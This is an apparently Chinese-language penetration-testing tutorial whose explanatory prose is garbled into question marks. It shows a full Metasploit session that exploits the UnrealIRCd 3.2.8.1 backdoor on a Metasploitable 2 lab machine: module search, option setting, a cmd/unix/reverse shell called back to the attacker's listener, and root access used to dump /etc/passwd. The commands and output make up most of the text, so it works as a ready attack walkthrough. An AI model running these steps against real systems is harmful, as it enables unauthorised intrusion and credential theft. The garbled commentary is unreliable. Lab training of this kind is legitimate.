???????????????Nmap

?????????4-3????MSF?????????????Unreal IRC????????????????Metasploit 2?????????????????192.168.6.105??????????????????????
??????1?????MSF????????????????????
????root@kali:~# msfconsole
????msf>
????????????????????msf>???????????????MSF????
??????2?????Unreal 3.2.8.1?????????顣????????????????
????msf > search Unreal 3.2.8.1
????Matching Modules
????================
????Name                                    Disclosure Date      Rank            Description
????----                                        ---------------        ---------------     ---------------------------
????exploit/linux/games/ut2004_secure                  2004-06-18           good             Unreal Tournament 2004 "secure" Overflow (Linux)
????exploit/unix/irc/unreal_ircd_3281_backdoor        2010-06-12             excellent                   UnrealIRCD 3.2.8.1 Backdoor Command Execution
????exploit/windows/games/ut2004_secure         2004-06-18           good              Unreal Tournament 2004 "secure" Overflow (Win32)
???????????????У???????????????????????顣????????????unreal_ircd_3281_backdoor??飬????????????á?
??????3????unreal_ircd_3281_backdoor??飬???????????????????????????????????
msf > info exploit/unix/irc/unreal_ircd_3281_backdoor
Name:     UnrealIRCD 3.2.8.1 Backdoor Command Execution
Module:   exploit/unix/irc/unreal_ircd_3281_backdoor
Platform:          Unix
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm <hdm@metasploit.com>
Available targets:
Id  Name
--  ----
0   Automatic Target
Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  6667             yes       The target port
Payload information:
Space: 1024
Description:
This module exploits a malicious backdoor that was added to the
Unreal IRCD 3.2.8.1 download archive. This backdoor was present in
the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th
2010.
References:
http://cvedetails.com/cve/2010-2075/
http://www.osvdb.org/65445
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
???????????????У????????????unreal_ircd_3281_backdoor???????????????У???????????????????????????????????ü???????????
??????4????????unreal_ircd_3281_backdoor??飬???????????????????????????????????????
????msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
????msf exploit(unreal_ircd_3281_backdoor) > show options
????Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
????Name   Current Setting  Required  Description
????----   ---------------  --------  -----------
????RHOST                   yes       The target address
????RPORT  6667             yes       The target port
????Exploit target:
????Id  Name
????--  ----
????0   Automatic Target
?????????????У???????????????????????????????????RPORT??????????????????????????RHOST??
??????5??????RHOST????????????????????????
????msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.6.105
????RHOST => 192.168.6.105
?????????????У???????????????????????192.168.6.105??
??????6???????п???????????ɡ?????????????????
????msf exploit(unreal_ircd_3281_backdoor) > show payloads
????Compatible Payloads
????===================
????Name                         Disclosure Date   Rank    Description
????------------------------------------      ------------------------ ------------- -----------------
????cmd/unix/bind_perl                                                           normal  Unix Command Shell?? Bind TCP (via Perl)
????cmd/unix/bind_perl_ipv6                                                      normal  Unix Command Shell?? Bind TCP (via perl) IPv6
????cmd/unix/bind_ruby                                                normal  Unix Command Shell?? Bind TCP (via Ruby)
????cmd/unix/bind_ruby_ipv6                                             normal  Unix Command Shell?? Bind TCP (via Ruby) IPv6
????cmd/unix/generic                                                     normal  Unix Command?? Generic Command Execution
????cmd/unix/reverse                                                             normal  Unix Command Shell?? Double Reverse TCP (telnet)
????cmd/unix/reverse_perl                                                normal  Unix Command Shell?? Reverse TCP (via Perl)
????cmd/unix/reverse_perl_ssl                                                    normal  Unix Command Shell?? Reverse TCP SSL (via perl)
????cmd/unix/reverse_ruby                                                       normal  Unix Command Shell?? Reverse TCP (via Ruby)
????cmd/unix/reverse_ruby_ssl                                          normal  Unix Command Shell?? Reverse TCP SSL (via Ruby)
????cmd/unix/reverse_ssl_double_telnet                                      normal  Unix Command Shell?? Double Reverse TCP SSL (telnet)
????????????????????unreal_ircd_3281_backdoor????п??????????ɡ????????????????????????????Щ????????????????Shell?????????????Meterpreter shell????????????????÷?Shell?????????????????????????Shell???????????
??????7????÷?Shell?????????????????????reverse?????????????????????????????????????????????????
????msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
????payload => cmd/unix/reverse
????msf exploit(unreal_ircd_3281_backdoor) > show options
????Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
????Name   Current Setting  Required  Description
????----   ---------------  --------  -----------
????RHOST  192.168.6.105    yes       The target address
????RPORT  6667             yes       The target port
????Payload options (cmd/unix/reverse):
????Name   Current Setting  Required  Description
????----   ---------------  --------  -----------
????LHOST                   yes       The listen address
????LPORT  4444             yes       The listen port
????Exploit target:
????Id  Name
????--  ----
????0   Automatic Target
??????????????У????????LHOST??????δ???á?
??????8??????LHOST????????????????????????
????msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.6.103
????LHOST => 192.168.6.103
??????????????????β??????????????????????????????????????
????msf exploit(unreal_ircd_3281_backdoor) > show options
????Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
????Name   Current Setting  Required  Description
????----   ---------------  --------  -----------
????RHOST  192.168.6.105    yes       The target address
????RPORT  6667             yes       The target port
????Payload options (cmd/unix/reverse):
????Name   Current Setting  Required  Description
????----   ---------------  --------  -----------
????LHOST  192.168.6.103    yes       The listen address
????LPORT  4444             yes       The listen port
????Exploit target:
????Id  Name
????--  ----
????0   Automatic Target
???????????????У????????????????????á?????????????й??????
??????9??????????????????????????????
????msf exploit(unreal_ircd_3281_backdoor) > exploit
????[*] Started reverse double handler
????[*] Connected to 192.168.6.105:6667...
????:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
????[*] Sending backdoor command...
????[*] Accepted the first client connection...
????[*] Accepted the second client connection...
????[*] Command: echo 4G58mrIzlfNG2zIm;
????[*] Writing to socket A
????[*] Writing to socket B
????[*] Reading from sockets...
????[*] Reading from socket B
????[*] B: "4G58mrIzlfNG2zIm "
????[*] Matching...
????[*] A is input...
????[*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.6.105:53656) at 2014-07-16 09:34:05 +0800
???????????????У????????????????????????????н????κ?Shell??????????????????????????????????????????????Shell?????????????κα????Linux??????磬??????????????????????????????????????
????whoami
???????????????????????????????????
????root
????????????????????????????????????????root??
?????????????????????????????????????????
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin??????:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator??????:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server??????:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user??111????:/home/user:/bin/bash
service:x:1002:1002:??????:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
??????????????????????????е?????????????????????Щ?????????????????????????